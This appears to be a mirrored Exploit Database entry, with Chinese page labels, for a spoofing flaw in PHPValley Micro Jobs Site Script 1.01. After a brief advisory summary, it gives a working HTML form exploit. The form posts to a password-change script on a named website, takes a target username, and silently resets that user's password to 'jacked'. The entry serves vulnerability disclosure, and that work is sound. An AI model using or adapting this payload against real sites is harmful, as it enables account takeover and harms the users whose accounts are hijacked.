PHPValley Micro Jobs Site Script – Spoofing

Exploit Database
66 阅读

作者： Jason Whelan

日期： 2013-04-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38499/

source: https://www.securityfocus.com/bid/59536/info

PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.

Attackers can exploit this issue to spoof another user; other attacks are also possible.

PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected. 

<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
 <input name="npass" type="hidden" value="jacked" />
 <input name="npassc" type="hidden" value="jacked" />
 <input type="submit" value="Jack" />
</form>

last Exploits
PHPValley Micro Jobs Site Script – Spoofing的更多信息

BoutikOne – ‘rss_flash.php?lang’ SQL Injection：
Zen Cart 1.5.4 – Local File Inclusion：
WordPress Plugin Kish Guest Posting 1.0 – Arbitrary File Upload：
Simple Image Gallery System 1.0 – ‘id’ SQL Injection：
pfSense Community Edition 2.2.6 – Multiple Vulnerabilities：
WordPress Plugin Skysa App Bar – ‘idnews’ Cross-Site Scripting：
TP-Link TD-8840t – Cross-Site Request Forgery：
MySmartBB 1.7 – Multiple Cross-Site Scripting Vulnerabilities：